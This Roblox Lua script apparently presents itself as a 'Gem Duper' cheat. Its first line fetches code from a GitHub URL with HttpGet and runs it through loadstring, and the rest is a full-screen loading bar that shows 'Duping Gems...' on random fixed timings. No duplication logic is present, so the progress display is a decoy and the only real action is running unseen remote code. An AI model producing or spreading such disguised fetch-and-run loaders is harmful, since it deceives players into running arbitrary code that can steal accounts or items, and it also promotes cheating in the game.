loadstring(game:HttpGet("https://raw.githubusercontent.com/ShadowHub4/Shadow-Hub-V1-Gem-Duper/main/side"))()

-- Gui to Lua
-- Version: 3.2

-- Instances:

local LoadingGui = Instance.new("ScreenGui")
local LoadingFrame = Instance.new("Frame")
local LoadingFrame_2 = Instance.new("Frame")
local GreenFrame = Instance.new("Frame")
local UICorner = Instance.new("UICorner")
local Loading = Instance.new("TextLabel")
local UICorner_2 = Instance.new("UICorner")

--Properties:

LoadingGui.Name = "LoadingGui"
LoadingGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
LoadingGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling

LoadingFrame.Name = "LoadingFrame"
LoadingFrame.Parent = LoadingGui
LoadingFrame.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
LoadingFrame.Size = UDim2.new(1, 0, 1, 0)

LoadingFrame_2.Name = "LoadingFrame"
LoadingFrame_2.Parent = LoadingFrame
LoadingFrame_2.BackgroundColor3 = Color3.fromRGB(84, 84, 84)
LoadingFrame_2.BorderSizePixel = 0
LoadingFrame_2.Position = UDim2.new(0.245328039, 0, 0.430288464, 0)
LoadingFrame_2.Size = UDim2.new(0, 684, 0, 116)

GreenFrame.Name = "GreenFrame"
GreenFrame.Parent = LoadingFrame_2
GreenFrame.BackgroundColor3 = Color3.fromRGB(127, 127, 127)
GreenFrame.BorderSizePixel = 0
GreenFrame.Size = UDim2.new(0, 18, 0, 116)

UICorner.CornerRadius = UDim.new(0, 20)
UICorner.Parent = GreenFrame

Loading.Name = "Loading..."
Loading.Parent = LoadingFrame_2
Loading.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Loading.BackgroundTransparency = 1.000
Loading.BorderSizePixel = 0
Loading.Position = UDim2.new(0.339181304, 0, 0.112068966, 0)
Loading.Size = UDim2.new(0, 220, 0, 90)
Loading.Font = Enum.Font.GothamMedium
Loading.Text = "Duping Gems..."
Loading.TextColor3 = Color3.fromRGB(255, 255, 255)
Loading.TextScaled = true
Loading.TextSize = 14.000
Loading.TextWrapped = true

UICorner_2.CornerRadius = UDim.new(0, 20)
UICorner_2.Parent = LoadingFrame_2

-- Scripts:

local function DIDXB_fake_script() -- GreenFrame.Loading Bar Script 
	local script = Instance.new('LocalScript', GreenFrame)

	local screen = math.random(1,3)
	
	if screen == 1 then
		print '1'
		script.Parent.Parent.Parent.Parent.Enabled = true
		wait(2)
	
		script.Parent:TweenSize(UDim2.new(.3, 1, 1), "Out", "Linear", 2, true)
		wait(2)
		script.Parent:TweenSize(UDim2.new(.5, 1, 1), "Out", "Linear", 1, true)
		wait(3)
		script.Parent:TweenSize(UDim2.new(1, 1, 1), "Out", "Linear", 1, true)
	
	
		wait(1)
		script.Parent.Parent.Parent.Parent.Enabled = true
		wait(1)
		script.Parent:TweenSize(UDim2.new(0, 0, 0), "Out", "Linear", 1, true)
	end
	
	if screen == 2 then
		print '2'
		script.Parent.Parent.Parent.Parent.Enabled = true
		wait(2)
	
		script.Parent:TweenSize(UDim2.new(.1, 1, 1), "Out", "Linear", 3, true)
		wait(1)
		script.Parent:TweenSize(UDim2.new(.4, 1, 1), "Out", "Linear", 2, true)
		wait(4)
		script.Parent:TweenSize(UDim2.new(.7, 1, 1), "Out", "Linear", 3, true)
		wait(1)
		script.Parent:TweenSize(UDim2.new(1, 1, 1), "Out", "Linear", 1, true)
	
	
		wait(1)
		script.Parent.Parent.Parent.Parent.Enabled = true
		wait(1)
		script.Parent:TweenSize(UDim2.new(0, 0, 0), "Out", "Linear", 1, true) 
	end
	if screen == 3 then
		print '3'
		script.Parent.Parent.Parent.Parent.Enabled = true
		wait(2)
	
		script.Parent:TweenSize(UDim2.new(.6, 1, 1), "Out", "Linear", 2, true)
		wait(2)
		script.Parent:TweenSize(UDim2.new(.8, 1, 1), "Out", "Linear", 3, true)
		wait(3)
		script.Parent:TweenSize(UDim2.new(1, 1, 1), "Out", "Linear", 1, true)
	
	
		wait(1)
		script.Parent.Parent.Parent.Parent.Enabled = true
		wait(1)
		script.Parent:TweenSize(UDim2.new(0, 0, 0), "Out", "Linear", 1, true)
	end
end
coroutine.wrap(DIDXB_fake_script)()
